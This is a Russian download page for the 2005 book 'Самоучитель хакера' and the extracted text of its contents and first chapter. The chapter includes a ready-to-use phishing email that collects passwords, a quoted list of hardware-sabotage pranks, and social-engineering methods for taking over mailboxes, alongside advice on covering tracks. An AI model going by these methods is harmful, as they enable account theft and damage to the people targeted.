Самоучитель хакера подробное руководство

Cамоучитель хакераПодробное иллюстрированное руководствоAlex Atsctoy — 2005.

     Что нового привносит в общий поток хакерской литературы эта небольшая книга? А то, что в ней вся необъятная тема хакинга рассмотрена в единственном, но самом важном аспекте — практическом.

Cамоучитель хакера - Подробное иллюстрированное руководство - Alex Atsctoy

Cодержание
Глава 1. Хакинг
Глава 2. Зашита Windows 2OOO/XP.
Глава з. Проникновение в систему
Глава 4. Сокрытие следов
Глава 5. Хакинг браузеров Web
Глава 6. Деструкция почтового клиента
Глава 7. Xaкинг ICQ
Глава 8. Хакинг Web-caйтов
Глава 9. Aтaки dos
Глава 10. Хакинг компьютеров Windows 2000/XP
Глава 11. Хакинг коммутируемого доступа
Список литературы

Бесплатно скачать электронную книгу в удобном формате, смотреть и читать:

Скачать книгу Cамоучитель хакера — Подробное иллюстрированное руководство — Alex Atsctoy — fileskachat.com, быстрое и бесплатное скачивание.

Скачать pdf
Ниже можно купить эту книгу по лучшей цене со скидкой с доставкой по всей России.Купить эту книгу

Скачать книгу  Cамоучитель хакера — Подробное иллюстрированное руководство — Alex Atsctoy — depositfiles

Скачать книгу  Cамоучитель хакера — Подробное иллюстрированное руководство — Alex Atsctoy — letitbit

Дата публикации:

Теги:

программирование :: хакерство :: хакинг :: самоучитель хакера :: иллюстрированное руководство :: Alex Atsctoy :: зашита Windows :: взлом браузеров :: хaкинг ICQ :: хакинг Web-caйтов :: взлом сайтов :: взлом компьютеров :: хакинг компьютеров :: книга :: скачать

Page 1: Самоучитель хакера подробное иилюстрированное руководство

Самоучительхакера

ПОДРОБНОЕИЛЛЮСТРИРОВАННОЕ

РУКОВОПСТВО

Page 2: Самоучитель хакера подробное иилюстрированное руководство

Page 3: Самоучитель хакера подробное иилюстрированное руководство

Alex Atsctoy

Самоучитель

ХАКЕРА

Подробное иллюстрированное руководство

«Лучшие книги»Москва

Page 4: Самоучитель хакера подробное иилюстрированное руководство

УДК 004.056.53(075.8)ББК 32.973.202-08я78-1+32.973.2б-018.2я78-1

АЗЗ

Alex Atsctoy.

АЗЗ Самоучитель хакера : подроб. иллюстрир. рук.: [учеб, пособие] /Alex Atsctoy. — М.: Лучшие книги, 2005. — 192 с.: ил. —ISBN 5-93673-036-0.

Агентство CIP РГБ

Что нового привносит в общий поток хакерской литературы эта не-

большая книга? А то, что в ней вся необъятная тема хакинга рассмотрена в

единственном, но самом важном аспекте — практическом.

Посетите наш Интернет-магазин®

«Три ступеньки »: www.3st.ru

E-mail: [email protected]

ISBN 5-93673-036-0 © ООО «Лучшие книги», 2005© Обложка ООО «Лучшие книги», 2005© Верстка и оформление ООО «Лучшие книги», 2005

Page 5: Самоучитель хакера подробное иилюстрированное руководство

Краткое содержание

Глава 1. ХакиИГ 8

Глава 2. Зашита Windows ZOOO/Xf. 25

Глава з. «Проникновение Ъ систему 37

Глава4. Сокрытиеследод 57

Глава5. Хзкинг fyay^epofc Web 73

Глава 6. Деструкция почтового клиента 83

Глава 7. XaKUHflCQ 99

Глава 8. Хакинг Web~caumo& 115

Глава9. AmaKU’PoS 143

Глава ю. Хакингкомпьютеров

Windows 2000/Xf 160

Глава 11. Хакииг коммутируемого доступа 176

Список литературы 191

Page 6: Самоучитель хакера подробное иилюстрированное руководство

Содержание

Глава 1.Хзки«Г …………………………………………………………………………………. 8

Хакеры и антихакеры ……………………………………….. . ………………………………………….. 9Что это такое — хакинг? ……………………………………………………………………………………… 10Как хакеры все это делают ………………………………………………………………………………….. 13

Инструменты хакинга …………………………………………………………………………………… 16Социальная инженерия …………………………………………………………………………………………. 16Предварительный сбор информации ……………………………………………………………………… 17Взломщики паролей доступа к файлам ………………………………………………………………….. 75Атака клиентов Web …………………………………………………………………………………………….. 19Атака серверов Web ……………………………………………………………………………………………… 20Сетевые сканеры …………………………………………………………………………………………………. 21Перехват сетевого трафика ………………………………………………………………………………… 21Встроенные средства операционной системы ………………………………………………………. 22Программы-экстойты …………………………………………………………………………………………. 22Вирусы и трояны ………………………………………………………………………………………………….. 23

Заключение ………………………………………………………………………………………………….. 23

Глава 2. 23Ш1ШЗ WmdOMS 2OOO/XP. ………………………………………. 25

Аутентификация ………………………………………………………………………………………….. 25

Авторизация ………………………………………………………………………………………………… 26

Аудит …………………………………………………………………………………………………………… 27

Как работает защита Windows 2000/XP …………………………………………………………. 28База SAM ……………………………………………………………………………………………………………… 29Объекты системы защиты ………………………………………………………………………………….. 30Активный каталог ……………………………………………………………………………………………….. 31Регистрация в домене Windows 2000 …………………………………………………………………….. 33

Антихакинг ………………………………………………………………………………………………….. 35

Заключение ………………………………………………………………………………………………….. 36

Глава з.Проиикио&еиие Ъ систему …………………………………………. з?Загрузка со съемного носителя ……………………………………………………………………… 38

Утилита NTFSDOS Pro ………………………………………………………………………………………… 39Взлом базы SAM …………………………………………………………………………………………………… 44Взлом доступа к файлам и папкам ………………………………………………………………………… 47Пароли за строкой ******** ………………………………………………………………………………… 50

Создание потайных ходов …………………………………………………………………………….. 51Добавление учетных записей ………………………………………………………………………………… 52Автозагрузка утилит …………………………………………………………………………………………… 53Клавиатурные шпионы …………………………………………………………………………………………. 53

Заключение …………………………………………………………………………………… .. 56

Page 7: Самоучитель хакера подробное иилюстрированное руководство

Содержание

Глава 4. Сокрытие следов 57Два аспекта задачи сокрытия следов 58

Локальная безопасность 59Глобальная безопасность 63Прокси-серверы 66

Сокрытие следов атаки 68Отключение аудита 69Очистка журналов безопасности 70

Заключение 72

Глава 5. Хзкииг £раузеро& Web 73Злонамеренный код HTML 74

Подмена Web-сайтов 78

Методы социальной инженерии 81

Заключение 82

Глава 6. Деструкция почтового клиента 83Мейлбомберы 83

Снаряжение м ейлбомбера 85Атака клонов 88Ковровое бомбометание списками рассылки 89Дополнительные вооружения мейлбомбера 90

Подбор паролей к почтовому ящику 91

Методы социальной инженерии 96

Заключение 97

Глава 7. ХакиИГ ICQ 99

Аськины угрозы 100

Экспериментальная интрасеть с сервисом ICQ 101

СпуфингиГК 102

Определение IP-адреса и порта ICQ-клиента 103

ICQ-флудеры 104

Взлом сервера ICQ 106

ICQ-крякеры 111Методы социальной инженерии 112

Заключение 113

Page 8: Самоучитель хакера подробное иилюстрированное руководство

Самоучитель хакера

Глава 8. ХзКМНГ We|?~C3UmO& 115

Функционирование Web-сайта 115

Этапы хакинга Web-сайта 116

Исследование Web-сайта 118Предварительный сбор данных 119Сканирование и инвентаризация сервера 120

Взлом сервера IIS 5 122ХакингНТТР 123Уязвимые сценарии 125

Web-спайдер Teleport Pro 131Мастер создания нового проекта 132Настройка свойств проекта 136Исследование кода HTML 138

Взлом доступа к страничкам Web 139

Заключение 142

Глава 9. Ahl3KU «РоЗ 143

Разновидности атак DoS 144

Атаки насыщением полосы пропускания 145ФлудериОР 145Флудер!8МР 147Флудер Smurf. 148

Атаки на истощение ресурсов 149

Атаки некорректными сетевыми пакетами 151Атаки Nuke 752Атаки Teardrop 154Атаки Ping of Death 154Атаки Land 755

Атаки фальсифицированными сетевыми пакетами 155Защита от атак DoS 756

Заключение 159

Глава 10. Хзкииг компьютеров Windows 2ООО/ХР. шСканирование сети TCP/IP 160

Инвентаризация сети 162Нулевой сеанс. 762

Реализация цели 165Проникновение в систему 765

6

Page 9: Самоучитель хакера подробное иилюстрированное руководство

Содержание

Расширение прав доступа и реализация атаки 168Приложение NetBus 169

Сокрытие следов 173

Заключение 175

Глава п. Хзкиигкоммутируемого доступа 176Источники номеров телефонов 177

Сканер PhoneSweep 4.4 178Диалог PhoneSweep 4.4 179Верхняя горизонтальная панель инструментов 180Вертикальная панель инструментов 782Значки в строке состояния 185

Работа с программой PhoneSweep 186Правила прозвана 186

Заключение 190

Слисок литературы ш

Page 10: Самоучитель хакера подробное иилюстрированное руководство

Г Л А В А 1 .

ХзкиигДопустим, вы — обычный человек, использующий компьютер на работе и домадля решения тех задач, для которых он, собственно, и предназначен его создате-лями. В том числе, вы любите путешествовать по Интернету, а также переписы-ваться со своими друзьями и знакомыми по электронной почте. И вот, в одинпрекрасный день к вам приходит письмецо примерно такого содержания (при-мер взят из журнала «Хакер»).

Уважаемый пользователь!!!

К сожалению, на Вашем счету был обнаружен факт двойного досту-па к нашему серверу, т.е. в одно и то же время, используя Ваш акка-унт, в систему вошли 2 (два) пользователя. Вследствие чего воз-никла необходимость в смене Вашего текущего пароля доступа кнашей сети.

Вам необходимо ответить на это письмо, используя следующийформат:

log: ваш логин

ор: ваш старый пароль

пр1: ваш новый пароль

пр2: ваш новый пароль

em: ваш e-mail

Эти сведения должны находиться в начале Вашего сообщения.Обратите внимание на то, что новый пароль должен быть повторендважды! Это необходимо для точной идентификации Вашего акка-унта. Рекомендуется прислать свои сведения до 13.06.1999, т.к. поистечении этого срока возможно отключение Вашего аккаунта.

Желаем Вам успехов!!!

С уважением,администрация сервера http://www.super-internet-provider.ru

Ваши дальнейшие действия определят ваш статус в том увлекательном и много-образном мире, который называется уже примелькавшимися терминами «кибер-пространство» или «виртуальное пространство». Если вы аккуратно заполнитеуказанные позиции и отошлете письмо обратно, то вы — «ламер», или, того ху-же, «лох», которого «напарили» проворные ребята, называющие себя «хакера-ми», «хацкерами», и даже «кул хацкерами». После этого знаменательного со-бытия вам, скорее всего, придется смириться с потерей некоей суммы денег,которую вы заплатили своему провайдеру Интернета за возможность подсое-диняться к серверу Интернета и рассматривать на экране компьютера всякиеразные Web-странички с интересными картинками.

Page 11: Самоучитель хакера подробное иилюстрированное руководство

Хакинг

Однако вас можно и поздравить с боевым крещением — вы впервые столкнулисьс тем, что называется «хакингом». Пусть вы и проиграли первую схватку — ни-чего, за одного битого двух небитых дают. У вас все еще впереди, и если вы несломитесь от первой неудачи, то, быть может, еще выйдете победителем в сра-жении, которое непрерывно ведется на просторах киберпространства почти ссамого момента его возникновения.

Это сражение ведется за обладание информацией — некой неощутимой и неве-сомой субстанцией, продуктом технического и научного прогресса человеческойцивилизации, возникшем еще на самой заре ее возникновения. В этой великойбитве за информационные ресурсы во все времена и народы принимало и при-нимает участие две стороны — обладатель информации, и, скажем так, «претен-дент» на ее обладание. И чего только не было придумано за многие века, чтобыполучить доступ к информации и одновременно, защитить информацию от по-сягательств разного рода охотников за чужими секретами! Эта борьба велась нена жизнь, а на смерть, с использованием любых способов и приемов, и ценойпобеды подчас становились судьбы целых народов.

И вот были изобретены компьютеры, вначале громоздкие и маломощные, по-том все более миниатюрные и высокопроизводительные. Последний шаг былсделан совсем недавно буквально у всех на глазах — за считанные годы, начи-ная примерно с 80-х годов прошедшего века, на столе у многих людей по все-му земному шару появились персональные компьютеры, и, что еще интерес-нее, появилась всемирная компьютерная сеть — Интернет, связывающая этикомпьютеры воедино.

И вот тут то все и началось.

Хакеры и антихакерыСуть произошедших перемен заключается в том, что ныне вся деятельность, по-священная подготовке и хранению информации, или уже переместилась, илиактивно перемещается на компьютеры. Люди постарше помнят заваленные бу-магами канцелярии и всякие разные конторы, заставленные письменными сто-лами, за которыми сидело множество людей, строчивших бумаги. Далее эти бу-маги печатались на машинках (ну и шум там стоял!), подшивались в папки иложились на полки шкафов и стеллажей на радость тараканам и мышам.

А теперь посмотрим на современный офис — вместо счетов и ручных калькуляторов(да-да, именно так это и было!) ныне на рабочих столах с современным дизайномстоят персональные компьютеры, и множество сидящих за компьютерами людейпризнаются, что уже просто отвыкли от использования ручек и карандашей.

На этих компьютерах делается все то, что называется обработкой информации,под которой подразумевается практически все — от подготовки документации на

9

Page 12: Самоучитель хакера подробное иилюстрированное руководство

Самоучитель хакера

суперсекретный прибор до составления расписания на пригородную электричку,от хранения банковских счетов до составления бухгалтерских отчетов. А дляпередачи всей этой, подчас, совершенно секретной, информации используютсякомпьютерные сети, пришедшие на замену дискетам, жестким дискам и прочимносителям данных, активно применяемых на первых этапах всеобщей компью-теризации. Таким образом, вся та информация, которая ранее пересылалась вбумажных конвертах по почте, теперь передается в виде электрических сигналовпо проводам компьютерной сети, или пучков света по оптоволоконным кабелям,или электромагнитного излучения в беспроводной сети, ну и так далее — сетевыетехнологи не стоят на месте.

Итогом всех этих революционных преобразований стал тот неоспоримый факт,что все сражения великой битвы за информационные ресурсы были немедленноперенесены на виртуальные просторы киберпространства. Теперь вместо обша-ривания пыльных шкафов в поисках нужной бумаги с чертежами секретногоприбора или финансового отчета компании, эти самые «претенденты» на обла-дание засекреченной информацией занялись взломом систем защиты компью-терных систем. Вместо набора отмычек, фонарика и веревочной лестницы, ис-пользуемых для проникновения в канцелярские помещения, заставленные неук-люжими шкафами и сейфами, современные взломщики, сидя за компьютерами,пытаются подсоединиться к секретной базе данных на сервере корпоративнойсети, находясь от нее на расстоянии в тысячи километров. Вместо установкижучков в телефоны руководства корпорации они, сидя в подвале, подсоединя-ются к проводам локальной сети организации и перехватывают всю передавае-мую по сети информацию, надеясь получить файл с секретными данными илипароли доступа к закрытому сетевому ресурсу. Технические средства измени-лись, но суть осталась прежней — как и в реальном мире, в киберпространствеведется отчаянная борьба за обладание информацией, причем не на жизнь, а насмерть, с применением любых методов и приемов.

Однако информационная революция конца 20-го века привнесла в эту схватку инечто новое — хакинг.

Что это такое г хакииг?ЕСЛИ раньше великая битва за информацию, в том числе с применением компь-ютеров, велась профессионалами, преследующими какие угодно, но, в любомслучае, рациональные цели — например, шпионаж — то массовое вторжение внашу жизнь компьютеров вовлекло в это сражение целую ораву самой разно-шерстной публики, которая, не имея никакого понятия о булевой алгебре ипринципах работы сумматора центрального процессора ЭВМ (все, все — большене буду) получила доступ к весьма мощному и эффективному вычислительномуустройству, работа с которым ранее считалась уделом яйцеголовых интеллек-

10

Page 13: Самоучитель хакера подробное иилюстрированное руководство

Хакинг

туалов. Именно в этой среде возникли первые хакеры и зародилось такое инте-ресное направление компьютерной деятельности, как хакинг — получение досту-па к закрытой информации с целями, которые можно назвать до некоторой сте-пени иррациональными.

Действительно, почитайте выпуски журнала «Хакер», и вы удивитесь многооб-разию вариантов использования компьютеров новоявленными бойцами инфор-мационных сражений. Вот пример «приложения» сил некоторых из участниковвеликой компьютерной битвы (пример из журнала «Хакер»).

Если твой друг ламер, то над его машиной можно произвести сле-дующие действия:

• Поменять ВСЕ кнопки на клавиатурах (произвольно, см. раздел фишки).

• Раскрутить корпус мыши, вытащить шарик, отсоединить провод отмикросхемы, свинтить корпус обратно.

• Разбить Hard DISK [используя прогу Маздая Fdisk.exe] на n-ое коли-чество логических дисков (сколько хард позволит, желательно по-больше) и свалить все на вирус.

• Заклеить кулер СКОТЧЕМ покрепче! А после, используя суперклей,приклеить его к процу навсегда!

• Начать форматирование и во время процесса [ 24% ] выключитькомп из сети, используя кнопочку POWER — его харду хана!

• Позагибать зубцы IDE-контроллеров на мамке.

Часть «советов» была отброшена, как устаревшая. Надеюсь, также, что вы дога-дались, что ламер — это нечто вроде «слабака», личности жалкой и убогой, не-достойной работы на компьютере, кулер — это вентилятор, HARD DISK илихард — это жесткий диск, прога — это программа, проц — процессор, а мамка -это материнская плата. Самым интересным словом в этом «опусе» являетсяМаздай, что является исковерканной фразой на английском языке «Must die», ввольном переводе означающей «Чтоб он сдох». В хакерской терминологииМаздаем называется операционная система Windows, которая как раз и должнаумереть, по мнению автора этих «советов».

Слово Маздай для нас интересно в том смысле, что оно хорошо иллюстрируетнаправленность мыслей личностей, занимающихся такого рода проделками.В самом деле, зачем Windows должна умереть? Ну, запортилась операционнаясистема или сломался жесткий диск, тебе-то что с того? Можно только предпо-ложить, что в новейшую историю на великую битву за информационные ресур-сы были рекрутированы, в том числе, личности весьма специфического склада,которые в былые годы морально удовлетворялись стрельбой из рогатки по про-хожим или истязаниями кошек в подвале.

11

Page 14: Самоучитель хакера подробное иилюстрированное руководство

Самоучитель хакера

И в самом деле, кто же занимается такими шалостями? Вот портрет одного изстолпов этой новой волны в молодежной культуре 21 века (журнал «Хакер»).

Имя: Доктор Добрянский

Особые приметы:

Лысый обугленный череп с клочками растительности и обрывкамипроводов, черные глаза без белков, длинное худое гибкое тело,хаотичная походка, пронзительный взгляд, неожиданные и резкиеброски на прохожих. Был одет в рваный радиоактивный халат, не-понятный головной убор и кеды «Скороход».

История:

За изобретение и распространение смертоносных девайсов сосланв сибирскую тайгу строгать матрешки из цельных кедров, но за хо-рошее поведение переведен на Заполярную АЭС в зону реактора.В результате несчастного случая отдельные микросхемы Докторазакоротило. Выдрав с корнем главный рубильник станции, совер-шил побег, попутно искусав охрану АЭС, трех белых медведей иодного моржа.

Деятельность:

Тяжелые электротехнические мутации. Вскрывает различные кноп-ки и подключает к ним не известные науке устройства. Обещаетмножественные оргазмы особям, нажавшим на эти кнопки. Подсое-диняет к дверям миниатюрные нестабильные реакторы. Начиняетмусоропроводы, тоннели и лифты высоковольтными фидерами,рубильниками и переключателями. Хочет подсоединить всех и вся кродной АЭС.

Хобби: модификация женского мозга посредством микропрограмм,распространяемых по электронной почте.

Впечатляет, не правда ли? Однако возникает вопрос — а при чем здесь всемирнаявойна за обладание ценной информации, всякие хлопоты по поиску информа-ции, взлому систем защиты компьютерных систем и прочие не такие уж и про-стые вещи? Неужели хакинг состоит в заклеивании «кулера» скотчем и в прочихувлекательных проделках, про которые можно почитать во многих выпускахжурнала «Хакер»?

А при том, что все это — не более чем миф.

Прежде чем сделать выводы относительно феномена хакинга, следует обратить-ся к серьезным исследованиям по этой теме, проводимой, как следовало ожи-дать, разными правительственными спецструктурами, озабоченными… ну и такдалее. И вот, исследовав ту часть населения США, которая устойчиво посвящаетсебя всякого рода штучкам в киберпространстве, ФБР (надеюсь, вы знаете, чтоэто такое) составило среднестатистический портрет хакера. Оказалось, что:

12

Page 15: Самоучитель хакера подробное иилюстрированное руководство

Хакинг

• Средний хакер — это молодой человек, возраста примерно от 16 до 19 лет.

• Большая часть (до 80%) этих молодых людей относятся к той части челове-ческих типов, которых называют английским словом «nerd». Это словечкоимеет два значения: 1) тормоз, зануда; 2) человек со всепоглощающимстремлением к учебе и научной деятельности. (Интересно, не правда ли?Все это как-то не вяжется с обликом доктора Добрянского).

• Средний хакер досконально знает операционные системы Windows и Unix,глубоко освоил стеки протоколов TCP/IP и программирование на несколькихязыках, например, C++, Perl, Basic.

Никак не претендуя на полноту и окончательность выводов, попытаемся подыто-жить все эти исследования следующим образом. Возникший совсем недавно вир-туальный мир — это все еще плохо освоенная территория, что-то вроде дикого за-пада Америки 19-го века. И каждому путешественнику по киберпространству,особенно по молодости, хочется попробовать свои силы на просторах этой дикойпрерии, вторгаясь на территории, занятые чужими племенами и поселениями.Если на входе в эту территорию стоит шлагбаум с табличкой «Проход закрыт», толюди, перешагнувшие через шлагбаум, становятся на тернистый путь хакера.Особое место занимают люди, перешагивающие через шлагбаумы по роду служ-бы, но они-то, как раз, хакерами себя и не называют.

Все зависит от вашего отношения к шлагбаумам, к людям, которые их устанавли-вают, а также с какой стороны шлагбаума вы живете. В зависимости от этого оби-татели виртуального мира разделились на две категории — на хакеров и всех про-чих, назовем их, для симметрии, «антихакерами». Вы сами должны определиться,с кем вам по пути. Чтобы помочь вам определиться, в книге сделана попытка про-стого и доступного описания основных приемов и методов, к которым прибегаютобе стороны — как хакеры, так и антихакеры — при выяснении отношений.

Стоит сделать некоторые уточнения. Под хакерами мы будем впредь пониматьпрофессионалов, способных проникать сквозь все заграждения, которые устанавли-ваются на подступах к заветному информационному ресурсу, а эти заграждения -весьма серьезная вещь. Антихакерами же мы будем называть профессионалов, спо-собных противостоять этим попыткам хакерского проникновения к закрытому ин-формационному ресурсу. И борьба между хакерами и антихакерами ведется ни нажизнь, а на смерть, с применением любых средств и тактических приемов.

Как хакеры все это делаютИтак, хакеру требуется получить доступ к желанному компьютерному ресурсу,т.е. пробраться на чужую, хорошо огороженную территорию. Следует сразуотметить, что реальные хакерские атаки отличаются от описанной выше за-манчивой картинки настолько, насколько реальные боевые столкновения отли-чаются от их голливудских интерпретаций. Все дело в том, что нынче потен-

13

Page 16: Самоучитель хакера подробное иилюстрированное руководство

Самоучитель хакера

циальные жертвы тоже не сидят без дела, и готовы разобраться с нежеланнымигостями по полной программе, так что хакерам приходится прилагать множе-ство усилий и проявлять большую изворотливость, чтобы решить свои задачи.

В полном соответствии с методами взломщиков, орудующих в реальном мире,которые тщательно планируют нападение на банки и прочие места, где водятсяденежки, настоящие хакеры также разрабатывают сценарии вторжения и готовятинструменты для доступа к лакомым ресурсам. Эти сценарии могут быть самы-ми различными, но все они выполняются в три этапа, полностью соответствую-щие действиям взломщиков в реальном мире: сбор информации — вторжение -заметание следов.

информацииС помощью различных источников хакеры ищут информацию, необходимуюдля проникновения на чужую территорию. Например, они могут использоватьИнтернет, обратившись к сайту организации, в сеть которой они хотят вторг-нуться, или рекламные буклеты этой организации, в которых можно найти но-мера телефонов корпорации, имена сотрудников и адреса их электронной почтыи так далее [3]. Далее хакеры выполняют сканирование сети организации длявыявления ее структуры, инвентаризации общих ресурсов, используемых опе-рационных систем, запущенных программ и систем защиты. Для этого сущест-вуют целые наборы программных инструментов, работу с которыми мы будемописывать на протяжении всей книги.

«Эиоржеиие

Собрав нужную информацию, в состав которой входит структура атакуемой ин-формационной системы, адреса серверов локальной сети организации, исполь-зуемые операционные системы и средства защиты, хакер приступает к вторже-нию. Излюбленный средствами массовой информации и Голливудом сюжетопусов на тему хакинга — взлом через Интернет компьютерной системы на дру-гом конце земного шара — это отнюдь не единственный метод доступа к закры-той информации, хотя и самый эффектный и привлекательный для зрителя. Еслихакер — это настоящий, решительно настроенный охотник за закрытой информа-цией, для достижения цели он использует тот метод, который наиболее эффек-тивен для решения задачи. Все зависит от обстоятельств, и если у хакера естьвозможность физического доступа к компьютеру, он им воспользуется, посколь-ку наиболее мощные средства взлома системы защиты предполагают локальныйдоступ к компьютерной системе.

14

Page 17: Самоучитель хакера подробное иилюстрированное руководство

Хакинг

Сокрытие следов

Каждый злоумышленник перед тем, как покинуть место преступления, заметаетследы, уничтожая отпечатки пальцев и другие следы, которые могут помочь егоидентификации. Так же и хакер должен уничтожить все следы своего вторже-ния, по которым его могут найти. Никогда не следует забывать, что в любой ма-ло-мальски защищенной системе функционируют средства аудита, регистрирую-щие все подозрительные действия пользователя. Другая задача заметания следов -сокрытие файлов, помещенных хакером в систему, и процессов, запущенных дляслежения за работой легитимных пользователей.

Для очистки следов пребывания существует множество методов, включающихочистку журналов аудита, сокрытие запущенных программ и процессов поме-щением их в ядро операционной системы (т.е. той ее части, которая невидимадля пользовательского интерфейса). Скажем, взамен подлинных процедур ядраоперационной системы, хакер может запустить подмененные процедуры, кото-рые будут оповещать его обо всех введенных пользователями паролях входнойрегистрации, и выполнять другие действия, например, пересылку хакеру рас-крытых паролей по Интернету. Такие задачи выполняются с помощью целыхкомплектов программ, которые в просторечии называются наборами отмычек,или, на сленге, «руткитами» (от английского слова rootkit — корневой комплектинструментов). «Руткиты» — весьма популярное средство хакинга систем UNIX,но и Windows 2000 не обойдена вниманием, и в Главе 4, посвященной целикомвопросам сокрытия следов хакинга, мы еще обсудим эту тему, хотя, надо ска-зать, настоящий «руткит» для Windows, по видимому, еще на стадии создания.

Другой аспект задачи сокрытия следов связан с Интернетом. При попытках ха-кинга через Интернет хакер должен скрыть свой IP-адрес, который очень легкофиксируется системами обнаружения вторжений и далее позволяет выловитьхакера прямо на рабочем месте. И тут мы сталкиваемся с совпадением задач ха-кинга и антихакинга — задача сохранения своей конфиденциальности актуальнадля обеих сторон. Для решения таких задач существует множество методов, са-мый лучший из которых — отказ от использования для хакинга компьютеров,способных выдать ваше местонахождение, подключение через прокси-серверы,использование специальных программ — брандмауэров, ограничивающих пере-дачу конфиденциальной информации от компьютера пользователя Интернета насервер. Мы рассмотрим эти задачи по мере изложения методов хакинга во всехглавах этой книги, а отдельно этой теме посвящена Глава 4 — и авторНАСТОЯТЕЛЬНО СОВЕТУЕТ ВСЕМ ПРОЧИТАТЬ ЭТУ ГЛАВУ САМЫМВНИМАТЕЛЬНЫМ ОБРАЗОМ, прежде чем применять на деле все те штучки,которые описаны в этой книге.

15

Page 18: Самоучитель хакера подробное иилюстрированное руководство

Самоучитель хакера

Инструменты ХзкинтвНа всех этапах сражений в киберпространстве хакеры и антйхакеры применяютвиртуальное оружие — специальные программные инструменты, для каждогоконкретного сценария атаки — свои. Все это соответствует реальной жизни — всамом деле, отправляясь на разбой незачем брать с собой отмычки, а для взломасейфа не требуется парабеллум. С другой стороны, чтобы защититься от атакиDoS вовсе не обязательно шифровать все свои файлы, а для защиты от хищенияномеров кредитных карточек вовсе не обязательно устанавливать систему IDS.В этой главе мы перечислим все описываемые в книге инструменты хакингавместе с кратким описанием их функций. Это позволит вам быстро сориенти-роваться в содержимом книги и не тратить время на изучение тех средств, ко-торые вы не собираетесь применять на практике.

Социальная инженерияГоворя понятнее, социальная инженерия — это мошенничество, которое пред-ставляет собой универсальный и всемогущий инструмент, применяемый прак-тически при всех сценариях вторжения. К социальной инженерии относитсярассылка электронной почты с вирусами и Троянами, телефонные звонки в ата-куемую организацию с целью выведать полезную для вторжения информацию,переговоры в чатах с целью выведать нужные хакеру данные и многое другое.

В начале главы мы привели пример письма, с помощью которого разного родаличности «напаривают лохов» с целью халявного доступа к Интернету. Другиепримеры писем подобного рода можно найти в журналах «Хакер»; их содержа-ние меняется в зависимости от наклонностей авторов, но есть и нечто общее.Суть этих писем одна — заставить «ламера» раскрыться и выдать конфиденци-альную информацию или выполнить действия, разрушающие систему защитыкомпьютера, к примеру, запустить прикрепленное к письму вложение с хакер-ской программой, скажем, троянского коня.

Что удивительно, так это простота, с помощью которой можно обойти все пре-пятствия системы защиты, воспользовавшись доверчивостью сотрудников ата-куемой фирмы. Например, в [3] приводится пример взлома почтового ящика со-трудника фирмы, выполненный с помощью звонка в справочный отдел органи-зации. Выдав себя за директора информационного отдела, «забывшего» свойпароль, позвонивший в справочный отдел один из авторов книги [3] тут же по-лучил пароль прямо по телефону!

Еще более интересный метод взлома почтового ящика предлагается в [1]. Обща-ясь в чатах, хакер выведывает адрес почтового ящика своей жертвы (якобы дляпоследующего общения). Далее хакер пытается открыть этот ящик и, не зная

16

Page 19: Самоучитель хакера подробное иилюстрированное руководство

Хакинг

пароля, прибегает к услуге, часто предоставляемой почтовыми серверами за-бывчивым клиентам — предоставлению пароля при ответе на контрольный во-прос. Как правило, список этих вопросов невелик, и включает такие пункты, как«Любимое блюдо», «Имя вашей собачки», «Девичья фамилия матери» и томуподобное. Допустим, при попытке взлома почтового ящика будет задан вопрос«Любимое блюдо». Все, что теперь нужно сделать хакеру — это, общаясь в чате,выведать у своей жертвы гастрономические пристрастия.

По мере изложения материала мы будем постоянно обращаться к теме социаль-ной инженерии, поскольку эта тема неисчерпаема. Всем, кто захочет еще боль-ше углубить свои познания в этой области, рекомендуем обратиться к выпускамжурнала «Хакер», все время преподносящего новинки в деятельности такогорода. Главное условие для их применения — наличие определенных специфиче-ских наклонностей и некоторые познания в человеческой психологии.

Предварительный с£ор информацииВ приведенном выше примере хакинга почтового ящика имя и фамилию дирек-тора информационного отдела взломщики узнали из регистрационной информа-ции доменных имен Интернета. Эту информацию без ограничений предостав-ляют многие Web-сайты Интернета (например, сайт компании RIPE NCC по ад-ресу http://www.ripe.net). Такие Web-сайты, содержащие базы данных Whols,весьма полезны для выполнения хакерских атак, тем более, что они не требуютникаких расходов и специальных программных инструментов.

Другую, не менее обширную информацию о взламываемой системе можно по-лучить из Интернета с помощью различных поисковых систем, например, пре-доставляемых различными Web-сайтами. К их числу относится Yahoo(http://www.yahoo.com), или русскоязычный сайт Rambler (http://www.rambler.ru).Применение этих сайтов весьма разнообразно. Например, просматривая разде-лы, посвященные финансовым организациям, хакеры ищут компании, находя-щиеся в процессе реорганизации. Как правило, в таких компаниях царит беспо-рядок, системы защиты ослабевают, и у хакера появляется шанс запустить кого-ток в нужный ему информационный ресурс [3].

Очень полезные для хакера сведения предоставляет поисковая система Google(http://www.google.com), позволяющая найти в Интернете серверы с опреде-ленной структурой каталогов. Например, выполнив поиск серверов, содержа-щих каталог C:\WINNT, можно выявить серверы с операционной системой Win-dows NT/2000. Тем самым будет решена одна из задач инвентаризации компью-терной системы — определение операционной системы, что весьма важно длявыбора стратегии хакинга системы.

17

Page 20: Самоучитель хакера подробное иилюстрированное руководство

Самоучитель хакера

Более эффективный поиск нужной информации в Интернете хакер может вы-полнить с помощью специальных программ, например, утилиты Teleport Pro.Эта утилита позволяет выполнять поиск в Интернете интересующей хакера ин-формации по указанному ключевому слову, загружать отдельные Web-сайты нажесткий диск, и исследовать их с целью выявления полезной информации.Например, хакеры ищут информацию, оставленную в коде HTML Web-страницпо недосмотру или по неосторожности — телефоны, адреса электронной почтысотрудников, структуру каталогов сервера HTTP и так далее. Все это весьмаценное приобретение, поскольку, зная, скажем, телефонный номер организации,хакер может прозвонить целый диапазон телефонных номеров, близких к най-денному номеру, и найти телефонную линию с модемом, подключенным к сете-вому компьютеру организации (все это описано в Главе 1 1 книги).

Ну и наконец, очень много ценной информации можно найти в рекламных бук-летах и содержимом Web-сайтов организаций — телефоны, адреса электроннойпочты сотрудников, их имена. Все эти сведения могут оказаться ниточкой, кото-рая приведет хакера к бреши в системе защиты компьютерной системы.

паролей доступа к файламИнформационные ресурсы, которые хакер может извлечь из атакуемой системы,хранятся в файлах документов и базах данных, и именно к ним хакеры пытаютсяполучить доступ. Решение этой задачи распадается на два этапа.

